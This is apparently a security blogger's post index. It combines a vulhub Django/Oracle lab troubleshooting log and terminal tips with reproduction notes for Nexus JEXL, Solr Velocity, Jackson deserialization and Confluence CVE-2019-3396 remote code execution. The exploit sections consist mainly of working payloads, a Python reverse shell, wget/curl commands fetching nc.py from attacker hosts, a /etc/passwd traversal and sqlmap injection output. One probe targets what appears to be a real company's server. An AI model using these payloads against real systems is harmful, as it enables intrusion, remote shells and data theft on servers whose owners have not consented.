------------------------------------------------------------------------------------------------
cve-2020-9402_db_1    /entrypoint.sh                   Up           1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1   /docker-entrypoint.sh pyth ...   Restarting 

Well: this time the web service was restarting outright; it has attitude. (Connection refused, unlike the earlier empty replies, means the container had just died and its port mapping was gone.) Nothing for it but to take the whole environment down and bring it back up.

#Into the container

This time my idea was to go into the container and see what the service was actually doing:

docker ps

a66976bc6d2b        cve-2020-9402_web      "/docker-entrypoint.…"   4 seconds ago       Up 3 seconds        0.0.0.0:8000->8000/tcp         cve-2020-9402_web_1
fc99758ce428        vulhub/oracle:12c-ee   "/entrypoint.sh"         5 seconds ago       Up 3 seconds        1521/tcp, 5500/tcp, 8080/tcp   cve-2020-9402_db_1

docker ps shows the CONTAINER ID of the container running the cve-2020-9402_web image; with that id we enter it:

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % sudo docker exec -it a66976bc6d2b /bin/bash
root@a66976bc6d2b:/usr/src# 
root@a66976bc6d2b:/usr/src# ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 06:44 ?        00:00:00 /bin/bash /docker-entrypoint.sh python manage.py runserver 0.0.0.0:8000
root         7     1  0 06:44 ?        00:00:00 bash /usr/local/bin/wait-for-it.sh -t 0 db:1521 -- echo oracle is up
root        56     0  0 06:45 pts/0    00:00:00 /bin/bash
root        73     7  0 06:45 ?        00:00:00 sleep 1
root        74    56  0 06:45 pts/0    00:00:00 ps -ef

At a glance nothing looked wrong: everything that should have started had started (note, though, that the entrypoint, PID 1, was still inside wait-for-it.sh waiting for db:1521, so python manage.py had not been reached yet). Could the db service be the problem? Just as I was wondering, the container restarted again, my shell dropped, and sure enough the state was Restarting once more. Painful.

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker ps

CONTAINER ID        IMAGE                  COMMAND                  CREATED             STATUS                         PORTS                          NAMES
a66976bc6d2b        cve-2020-9402_web      "/docker-entrypoint.…"   2 minutes ago       Restarting (1) 2 seconds ago

#Troubleshooting with the logs :-)

Before digging in, the help for docker's log command:

% docker logs --help

Usage:  docker logs [OPTIONS] CONTAINER

Fetch the logs of a container

Options:
      --details        Show extra details provided to logs
  -f, --follow         Follow log output
      --since string   Show logs since timestamp (e.g. 2013-01-02T13:23:37) or relative (e.g. 42m for 42 minutes)
      --tail string    Number of lines to show from the end of the logs (default "all")
  -t, --timestamps     Show timestamps
      --until string   Show logs before a timestamp (e.g. 2013-01-02T13:23:37) or relative (e.g. 42m for 42 minutes)

Here -f follows the log output (the container id is the positional CONTAINER argument, not a flag), and --since limits the output to entries after a timestamp. What I wanted was the web container's log from a given point in time onwards, so the command is docker logs --since 2020-09-11T14:50:00 -f b5731d06d3ea. The web log:

bin4xin@bin4xin's MacbookPro shiro % docker logs --since 2020-09-11T14:40:00  -f ae715c332e7e
+ cd /usr/src
+ wait-for-it.sh -t 0 db:1521 -- echo 'oracle is up'
wait-for-it.sh: waiting for db:1521 without a timeout
wait-for-it.sh: db:1521 is available after 60 seconds
oracle is up

No error so far; further on comes the failure:

+ python manage.py makemigrations
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/site-packages/django/db/backends/base/base.py", line 220, in ensure_connection
    self.connect()
  File "/usr/local/lib/python3.6/site-packages/django/utils/asyncio.py", line 26, in inner
    return func(*args, **kwargs)
  File "/usr/local/lib/python3.6/site-packages/django/db/backends/base/base.py", line 197, in connect
    self.connection = self.get_new_connection(conn_params)
  File "/usr/local/lib/python3.6/site-packages/django/utils/asyncio.py", line 26, in inner
    return func(*args, **kwargs)
  File "/usr/local/lib/python3.6/site-packages/django/db/backends/oracle/base.py", line 232, in get_new_connection
    **conn_params,
cx_Oracle.DatabaseError: ORA-12505: TNS:listener does not currently know of SID given in connect descriptor


The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "manage.py", line 21, in <module>
    main()
    ... (middle of the traceback omitted)
    **conn_params,
django.db.utils.DatabaseError: ORA-12505: TNS:listener does not currently know of SID given in connect descriptor

The error is coming from the db, so straight to the db container's log: docker logs --since 2020-09-11T14:40:00 -f b32b16e34b6c (db):

ls: cannot access /u01/app/oracle/oradata/orcl: No such file or directory
No databases found in /u01/app/oracle/oradata/orcl. About to create a new database instance
Starting database listener

LSNRCTL for Linux: Version 12.1.0.2.0 - Production on 11-SEP-2020 06:54:05

Copyright (c) 1991, 2014, Oracle.  All rights reserved.

Starting /u01/app/oracle/product/12.1.0.2/dbhome_1/bin/tnslsnr: please wait...

TNSLSNR for Linux: Version 12.1.0.2.0 - Production
System parameter file is /u01/app/oracle/product/12.1.0.2/dbhome_1/network/admin/listener.ora
Log messages written to /u01/app/oracle/diag/tnslsnr/b32b16e34b6c/listener/alert/log.xml
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=b32b16e34b6c)(PORT=1521)))

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=b32b16e34b6c)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias                     LISTENER
Version                   TNSLSNR for Linux: Version 12.1.0.2.0 - Production
Start Date                11-SEP-2020 06:54:05
Uptime                    0 days 0 hr. 0 min. 0 sec
Trace Level               off
Security                  ON: Local OS Authentication
SNMP                      OFF
Listener Parameter File   /u01/app/oracle/product/12.1.0.2/dbhome_1/network/admin/listener.ora
Listener Log File         /u01/app/oracle/diag/tnslsnr/b32b16e34b6c/listener/alert/log.xml
Listening Endpoints Summary...
  (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=b32b16e34b6c)(PORT=1521)))
The listener supports no services
The command completed successfully
Copying database files
1% complete
3% complete
11% complete
18% complete

The database listener appears to be up, but the database files are still being copied (Copying database files), so wait for the copy to finish and see whether the copying is the cause.

100% complete
Look at the log file "/u01/app/oracle/cfgtoollogs/dbca/orcl/orcl.log" for further details.

LSNRCTL for Linux: Version 12.1.0.2.0 - Production on 11-SEP-2020 07:00:33

Copyright (c) 1991, 2014, Oracle.  All rights reserved.

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=b32b16e34b6c)(PORT=1521)))
The command completed successfully
Database has been created in /u01/app/oracle/oradata/orcl
SYS and SYSTEM passwords are set to [oracle]
Setting HTTP port to 8080

PL/SQL procedure successfully completed.

Please login to http://<ip_address>:8080/em to use enterprise manager
User: sys; Password oracle; Sysdba: true
Fixing permissions...
Running init scripts...
Init scripts in /oracle.init.d/: Ignoring /oracle.init.d/*

Done with scripts we are ready to go

So the web failure was caused by the db after all: the error is an Oracle error, and at the moment we read the logs the db was indeed still in that state. Back to the web container's log, and sure enough: once the db container had finished creating the database, the web container's next restart brought the service up without errors, listening on port 8000.

The mechanism: wait-for-it.sh only tests that db:1521 accepts a TCP connection. The Oracle listener opens that port early and reports "The listener supports no services" until DBCA has finished creating the orcl instance, so the first python manage.py makemigrations hits ORA-12505 (the listener does not know the SID yet), the entrypoint exits, and the container's restart policy keeps relaunching it until the database really exists. Port open is not the same as service ready.

+ cd /usr/src
+ wait-for-it.sh -t 0 db:1521 -- echo 'oracle is up'
wait-for-it.sh: waiting for db:1521 without a timeout
wait-for-it.sh: db:1521 is available after 0 seconds
oracle is up
+ python manage.py makemigrations
Migrations for 'vuln':
  vuln/migrations/0001_initial.py
    - Create model Names
    - Create model Collection
    - Create model Collection2
+ python manage.py migrate
Operations to perform:
  Apply all migrations: admin, auth, contenttypes, sessions, vuln
Running migrations:
  Applying contenttypes.0001_initial... OK
  Applying auth.0001_initial... OK
  Applying admin.0001_initial... OK
  Applying admin.0002_logentry_remove_auto_add... OK
  Applying admin.0003_logentry_add_action_flag_choices... OK
  Applying contenttypes.0002_remove_content_type_name... OK
  Applying auth.0002_alter_permission_name_max_length... OK
  Applying auth.0003_alter_user_email_max_length... OK
  Applying auth.0004_alter_user_username_opts... OK
  Applying auth.0005_alter_user_last_login_null... OK
  Applying auth.0006_require_contenttypes_0002... OK
  Applying auth.0007_alter_validators_add_error_messages... OK
  Applying auth.0008_alter_user_username_max_length... OK
  Applying auth.0009_alter_user_last_name_max_length... OK
  Applying auth.0010_alter_group_name_max_length... OK
  Applying auth.0011_update_proxy_permissions... OK
  Applying sessions.0001_initial... OK
  Applying vuln.0001_initial... OK
+ python manage.py loaddata collection.json
Installed 8 object(s) from 1 fixture(s)
+ python manage.py shell -c 'from django.contrib.auth.models import User; User.objects.create_superuser('\''admin'\'', '\''admin@vulhub.org'\'', '\''admin'\'') if not User.objects.filter(username='\''admin'\'').exists() else 0'
+ exec python manage.py runserver 0.0.0.0:8000
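A readiness gate that checks what wait-for-it.sh cannot, as an added example that is not part of the original post or of the vulhub environment. Instead of asking whether db:1521 accepts connections, it judges readiness from the db container's own log markers (the ones visible above), so the web side would only start its migrations once DBCA is finished. The log lines in the test are constructed from the output shown above; docker_log_lines() assumes the docker CLI is on PATH:

```python
"""Oracle-container readiness gate driven by log markers rather than by the
listener port. Added example, not from the original post or from vulhub."""
import re
import subprocess
import sys
import time

# Markers taken from the db container log above, in the order they appear.
LISTENER_ONLY = "The listener supports no services"
DB_CREATED = "Database has been created"
ALL_DONE = "Done with scripts we are ready to go"
ORA_NO_SID = re.compile(r"ORA-12505")


def oracle_state(log_lines):
    """'down', 'listener-only', 'created' or 'ready', from the most advanced marker seen so far."""
    state = "down"
    for line in log_lines:
        if ALL_DONE in line:
            state = "ready"
        elif DB_CREATED in line and state != "ready":
            state = "created"
        elif LISTENER_ONLY in line and state == "down":
            state = "listener-only"
    return state


def web_failed_on_db(web_log_lines):
    """True when the web container died on the SID error this race produces."""
    return any(ORA_NO_SID.search(line) for line in web_log_lines)


def wait_until_ready(read_log, timeout=900, interval=5, clock=time.monotonic, sleep=time.sleep):
    """Poll read_log() (a callable returning log lines) until the db is 'ready'; False on timeout.
    clock and sleep are injectable so the loop can be tested without real waiting."""
    deadline = clock() + timeout
    while oracle_state(read_log()) != "ready":
        if clock() >= deadline:
            return False
        sleep(interval)
    return True


def docker_log_lines(container):
    """read_log() for a real container: `docker logs <container>`, stdout and stderr together."""
    proc = subprocess.run(["docker", "logs", container], capture_output=True, text=True, check=False)
    return (proc.stdout + proc.stderr).splitlines()


if __name__ == "__main__":
    # usage: python3 gate.py cve-2020-9402_db_1 && docker-compose restart web
    name = sys.argv[1] if len(sys.argv) > 1 else "cve-2020-9402_db_1"
    sys.exit(0 if wait_until_ready(lambda: docker_log_lines(name)) else 1)
```

The same idea belongs in the compose file for good: a healthcheck on the db service that greps for the final marker, and depends_on with condition: service_healthy on the web service, so the web container is not even started until the database exists.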

#A disappointing result

With exec python manage.py runserver 0.0.0.0:8000 in the log it looked as if nothing was wrong any more; check docker's state once again.

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps
       Name                      Command               State              Ports            
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1    /entrypoint.sh                   Up      1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1   /docker-entrypoint.sh pyth ...   Up      0.0.0.0:8000->8000/tcp    

Everything is Up, and port 8000 finally serves the web application instead of Empty reply from server.

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % curl localhost:8000
<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <title>Page not found at /</title>
  <meta name="robots" content="NONE,NOARCHIVE">
  <style type="text/css">
    html * { padding:0; margin:0; }
    body * { padding:10px 20px; }
    body * * { padding:0; }
    body { font:small sans-serif; background:#eee; color:#000; }
    body>div { border-bottom:1px solid #ddd; }
    h1 { font-weight:normal; margin-bottom:.4em; }
    h1 span { font-size:60%; color:#666; font-weight:normal; }
    table { border:none; border-collapse: collapse; width:100%; }
    td, th { vertical-align:top; padding:2px 3px; }
    th { width:12em; text-align:right; color:#666; padding-right:.5em; }
    #info { background:#f6f6f6; }
    #info ol { margin: 0.5em 4em; }
    #info ol li { font-family: monospace; }
    #summary { background: #ffc; }
    #explanation { background:#eee; border-bottom: 0px none; }
  </style>

Web access log:

Watching for file changes with StatReloader
Not Found: /
[11/Sep/2020 07:01:23] "GET / HTTP/1.1" 404 2137

Not Found: /
[11/Sep/2020 07:06:47] "GET / HTTP/1.1" 404 2141
---
Parameter: q (GET)
    Type: boolean-based blind
    Title: Oracle boolean-based blind - Parameter replace
    Payload: q=(SELECT (CASE WHEN (6457=6457) THEN 6457 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

    Type: time-based blind
    Title: Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)
    Payload: q=(SELECT (CASE WHEN (6135=6135) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(74)||CHR(88)||CHR(115),5) ELSE 6135 END) FROM DUAL)
---
[15:22:11] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle

[Read More]

「Tips」: linux & unix terminal tricks

Sep 1, 2020. | By: Bin4xin

grep

  • grep -n "get_spg2lsf" -r ./

Find the files under the current directory that contain the string "get_spg2lsf" (-r recurses, -n prints line numbers)

vim

Quick deletion

1. Delete the first 10 characters of every line:

  • :%s/^.\{10}//

Here % means all lines and s means substitute; "%s" can be written as "1,$" (likewise below);

in the pattern /^.\{10}/, ^ anchors to the start of the line, "." matches one character and "\{10}" repeats it 10 times (in vim's default regex syntax the braces have to be escaped; 10 literal dots work too).

2. Delete the last 10 characters of every line

  • :%s/.\{10}$//

String replacement

In vi/vim the :s command substitutes strings.

  :s/vivian/sky/ replace the first vivian on the current line with sky

  :s/vivian/sky/g replace every vivian on the current line with sky

  :n,$s/vivian/sky/ replace the first vivian on each line from line n to the last line with sky

  :n,$s/vivian/sky/g replace every vivian on each line from line n to the last line with sky

awk

A problem met during real-world information gathering:

I have a hosts file listing the domains and IP addresses to gather information on, stored in this format: domain.com.cn,1.1.1.1

The first step of my information gathering is to go over the ports of each IP or domain, and that is where the problem starts: nmap cannot read this format; it needs one entry per line, that is:

domain.com.cn1
ip1
domain.com.cn2
ip2

Domains and IPs alike have to be stored this way before -iL can read them and the port scan can run, so the two columns need to be split into two files on the comma;

the plan, then: use the comma as the delimiter, refer to the first and second columns as $1 and $2, and write $1 to domain1.txt and $2 to domain2.txt.
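The split described above, as an added example that is not part of the original post. The awk form is a one-liner, awk -F, '{print $1 > "domain1.txt"; print $2 > "domain2.txt"}' hosts; the Python version below keeps the post's file names but classifies each field by content, so a file with the columns swapped or with CIDR ranges still comes out right, and duplicates are dropped. The rows in the test are constructed:

```python
"""Split a 'domain,ip' hosts file into one-entry-per-line files for nmap -iL.
Added example, not from the original post."""
import csv
import ipaddress
import sys


def classify(field):
    """'ip' for an IPv4/IPv6 address or CIDR range, 'domain' for any other non-empty value, None for blanks."""
    value = field.strip()
    if not value:
        return None
    for parse in (ipaddress.ip_address, lambda v: ipaddress.ip_network(v, strict=False)):
        try:
            parse(value)
            return "ip"
        except ValueError:
            pass
    return "domain"


def split_hosts(rows):
    """rows: iterable of comma-separated lines in any column order.
    Returns (domains, ips), each deduplicated with first-seen order kept."""
    domains, ips, seen = [], [], set()
    for fields in csv.reader(rows):
        for field in fields:
            value = field.strip()
            kind = classify(value)
            if kind is None or value in seen:
                continue
            seen.add(value)
            (ips if kind == "ip" else domains).append(value)
    return domains, ips


def write_targets(hosts_path, domain_out="domain1.txt", ip_out="domain2.txt"):
    """Write one entry per line so both files can be fed to nmap -iL. Returns (n_domains, n_ips)."""
    with open(hosts_path, encoding="utf-8") as f:
        domains, ips = split_hosts(f)
    for path, items in ((domain_out, domains), (ip_out, ips)):
        with open(path, "w", encoding="utf-8") as f:
            f.writelines(item + "\n" for item in items)
    return len(domains), len(ips)


if __name__ == "__main__":
    print(write_targets(sys.argv[1] if len(sys.argv) > 1 else "hosts"))
```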

[Read More]

Just a quick record of the PoC for this management software;

POST /service/extdirect HTTP/1.1
Host: vuln_ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json; charset=UTF-8
Content-Length: 7249

{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x=[…]; y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n    y,\n   'Exploit.Test234',\n    z.getBytes('latin1'),    0,\n    3054\n);x.getMethod('test', ''.class).invoke(null, 'ifconfig');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}

The "expression" filter is evaluated as JEXL on the server: the hex string x is turned back into class bytes, defineClass() loads them through the thread's context class loader, and the last invoke() runs the command (ifconfig above). To get a shell, swap that last argument:

getshell:

Download the reverse-shell script
invoke(null, 'wget http://vps_to_your_py:8000/nc.py');
---
cat nc.py

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("vps_ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

----
On your VPS:

nc -lvnp 18080
Listening on 0.0.0.0 1111
invoke(null, 'python nc.py');

That is all. (The port in nc.py and the port nc listens on must of course be the same one; the two figures above come from different runs.)

[Read More]

「vulnhub」: Apache RCE reproduction notes

Aug 22, 2020. | By: Bin4xin

Apache Solr vuln

curl "http://192.168.137.181:8983/solr/admin/cores?indexInfo=false&wt=json"

{
  "responseHeader":{
    "status":0,
    "QTime":0},
  "initFailures":{},
  "status":{
    "demo":{
      "name":"demo",
      "instanceDir":"/var/solr/data/demo",
      "dataDir":"/var/solr/data/demo/data/",
      "config":"solrconfig.xml",
      "schema":"managed-schema",
      "startTime":"2020-08-22T01:42:03.422Z",
      "uptime":51628
          }
    }
}

The key is the core: here name "demo", instanceDir and so on. Set Content-Type: application/json and POST the following body to that core's config endpoint; it registers the Velocity response writer with template loading from request parameters switched on:

POST /solr/demo/config HTTP/1.1
Host: 192.168.137.181:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}
/////////////////////////////////////////////////////////////////////////////////////

Response:
HTTP/1.1 200 OK
Connection: close
Content-Type: text/plain;charset=utf-8
Content-Length: 149

{
  "responseHeader":{
    "status":0,
    "QTime":425},
  "WARNING":"This response format is experimental.  It is likely to change in the future."}

RCE payload, sent to the core found above (the path must name the real core, demo here; the original note had a placeholder in its place):

/solr/demo/select?wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27pwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

getshell:

$rt.getRuntime().exec(%27curl%20-o%20/tmp/nc.py%20http://www.chihou.pro:8000/nc.py%27)


wget%20-O%20/tmp/nc.py%20http://www.chihou.pro:8000/nc.py

(with wget the output file is -O; lowercase -o names the log file, so the original -o would have left nc.py in the working directory instead)

$rt.getRuntime().exec(%27python%20/tmp/nc.py%27)

If basic authentication sits in front of the admin API, that has to be passed first.
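Two checks for the Velocity writer weakness reproduced above, as an added example that is not part of the original post or of Solr itself. cores_to_check() takes the /solr/admin/cores?wt=json body and lists the cores whose /config must be inspected (the post's only core is "demo"); velocity_exposed() takes a core's /config or /config/overlay body and reports writers that load templates from request parameters, which is exactly what the update-queryresponsewriter request above switches on. The /admin/cores sample is the post's own response; the /config sample is constructed, and its layout, {"config": {"queryResponseWriter": {name: {...}}}} with "overlay" as the top-level key for the overlay, is an assumption made here:

```python
"""Audit helpers for the Solr Velocity response writer. Added example, not from
the original post or from Solr."""
import json

# The post's own /solr/admin/cores response.
CORES_JSON = json.dumps({"responseHeader": {"status": 0, "QTime": 0}, "initFailures": {},
    "status": {"demo": {"name": "demo", "instanceDir": "/var/solr/data/demo",
                        "dataDir": "/var/solr/data/demo/data/", "config": "solrconfig.xml",
                        "schema": "managed-schema", "startTime": "2020-08-22T01:42:03.422Z",
                        "uptime": 51628}}})

# Constructed /solr/demo/config body after the update-queryresponsewriter request (assumed layout).
CONFIG_JSON = json.dumps({"responseHeader": {"status": 0, "QTime": 1}, "config": {
    "queryResponseWriter": {
        "json": {"name": "json", "class": "solr.JSONResponseWriter"},
        "velocity": {"name": "velocity", "class": "solr.VelocityResponseWriter",
                     "startup": "lazy", "template.base.dir": "",
                     "solr.resource.loader.enabled": "true",
                     "params.resource.loader.enabled": "true"}}}})


def cores_to_check(cores_json):
    """Core names from /solr/admin/cores; each one needs a /solr/<core>/config request."""
    return sorted(json.loads(cores_json).get("status", {}))


def _is_true(value):
    return str(value).lower() == "true"


def velocity_exposed(config_json):
    """Writers that are VelocityResponseWriter with params.resource.loader.enabled=true,
    i.e. templates can arrive in the v.template.custom parameter of any select request."""
    doc = json.loads(config_json)
    writers = (doc.get("config") or doc.get("overlay") or {}).get("queryResponseWriter", {})
    return sorted(name for name, w in writers.items()
                  if w.get("class") == "solr.VelocityResponseWriter"
                  and _is_true(w.get("params.resource.loader.enabled", False)))


def remediation_body(writer_name="velocity"):
    """Config API body that removes the writer again (the delete- counterpart of update-queryresponsewriter)."""
    return json.dumps({"delete-queryresponsewriter": writer_name})


if __name__ == "__main__":
    for core in cores_to_check(CORES_JSON):
        print(core, "exposed writers:", velocity_exposed(CONFIG_JSON), "fix:", remediation_body())
```

In a real check, fetch /solr/<core>/config for every name cores_to_check() returns; a non-empty velocity_exposed() result on a Solr that is reachable without authentication is the condition the payload above needs.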

Apache ActiveMQ vuln

  • Detection
Nmap scan report for 39.99.161.182
Host is up (0.095s latency).

PORT     STATE SERVICE VERSION
8161/tcp open  http    Jetty 8.1.16.v20140903
|_http-server-header: Jetty(8.1.16.v20140903)
|_http-title: Apache ActiveMQ

[Read More]

「vulnhub」: JSON deserialization notes

Aug 14, 2020. | By: Bin4xin

Telling Fastjson and Jackson apart

POST bodies:

{"name":"S", "age":21}

{"name":"S", "age":21,"agsbdkjada__ss_d":123}

Fastjson accepts both without error, while Jackson errors on the second: by default it requires the keys to line up with the JavaBean's properties (fewer keys are allowed, extra ones are not), so the unknown key raises an exception. One caveat: that is Jackson's FAIL_ON_UNKNOWN_PROPERTIES feature, which an application can switch off (Spring Boot's auto-configured ObjectMapper disables it), so a lenient answer on its own does not prove Fastjson.

cat jackson1.xml

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <array>
                <value>curl</value>
		<value>http://47.52.233.92:8000/pc.py</value>
            </array>
        </constructor-arg>
        <property name="any" value="#{ pb.start() }"/>
    </bean>
</beans>
----------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
POST /exploit HTTP/1.1
Host: 192.168.43.14:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Content-Length: 142

{
  "param": [
   "org.springframework.context.support.FileSystemXmlApplicationContext",
   "http://47.52.233.92:8000/jackson1.xml"
  ]
}

Log of the python http.server hosting jackson1.xml: the two GET /jackson1.xml requests are the target loading the context definition, and the GET /pc.py right after them is the ProcessBuilder curl from the bean already running on the target (the file simply was not there):

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
223.246.173.228 - - [31/Aug/2020 16:05:12] "GET /jackson1.xml HTTP/1.1" 200 -
223.246.173.228 - - [31/Aug/2020 16:05:12] "GET /jackson1.xml HTTP/1.1" 200 -
223.246.173.228 - - [31/Aug/2020 16:05:12] code 404, message File not found
223.246.173.228 - - [31/Aug/2020 16:05:12] "GET /pc.py HTTP/1.1" 404 -

Probing for Jackson (the response below is the endpoint's own exception serialised with its full stack trace: the JSON body was accepted, and the verbose error is an information leak in its own right):

POST /jubaopen/api2/wealth/mail/getCheckCode HTTP/1.1
Host: dev.pactera.com
Content-Length: 24
DNT: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.58
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
timeStamp: 1597418145214
userId: undefined
token: undefined
deviceType: 2
Origin: http://dev.pactera.com
Referer: http://dev.pactera.com/jubaopen/weixin2/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

{"name":"S", "age":21}
HTTP/1.1 200 
Server: nginx/1.16.1
Date: Fri, 14 Aug 2020 15:21:32 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: POST,GET,PUT,OPTIONS,DELETE,PATCH
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Content-Length: 19469

{"code":null,"msg":null,"data":{"cause":null,"stackTrace":[{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"parse","fileName":"InternetAddress.java","lineNumber":696,"nativeMethod":false,"className":"javax.mail.internet.InternetAddress"},{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"parse","fileName":"InternetAddress.java","lineNumber":655,"nativeMethod":false,"className":
···
···
···
methodName":"run","fileName":"Thread.java","lineNumber":830,"nativeMethod":false,"className":"java.lang.Thread"}],"message":null,"suppressed":[],"localizedMessage":null}}

[Read More]

「Src」: Confluence vulnerability reproduction notes

Jul 23, 2020. | By: Bin4xin

Confluence unauthenticated RCE (CVE-2019-3396)

File read:

url: /confluence/rest/tinymce/1/macro/preview

{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../../../../../etc/passwd"}}}
RCE:

Generate a cmd.vm file and host it on your own server.

cat cmd.vm
#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
    $scan.next()
#end

The vulnerability behaves like a remote file inclusion: the _template parameter is fetched and rendered as a Velocity template, and the other params (cmd here) are visible to it. So run an FTP server, reference the template from the POST body, and the template executes cmd and prints the output.

python3 -m pyftpdlib -p 2121
[I 2020-07-23 15:47:58] concurrency model: async
[I 2020-07-23 15:47:58] masquerade (NAT) address: None
[I 2020-07-23 15:47:58] passive ports: None
[I 2020-07-23 15:47:58] >>> starting FTP server on 0.0.0.0:2121, pid=25460 <<<
Execute a command:
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"ftp://www.chihou.pro:2121/cmd.vm","cmd":"whoami"}}}

Download and launch a reverse shell:
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"ftp://www.chihou.pro:2121/cmd.vm","cmd":"curl -o /tmp/nc.py ftp://www.chihou.pro:2121/nc.py"}}}

"python /tmp/nc.py"

[Read More]

「CS」: learning internal-network pentest tooling

Jun 22, 2020. | By: Bin4xin

  • oops! wait plz~

[Read More]

aq domain tool

This only records some of the errors hit with the aq tool; for problems not solved here, look up other people's write-ups.

  • Change the gem source. Always switch the source before installing anything with gem;
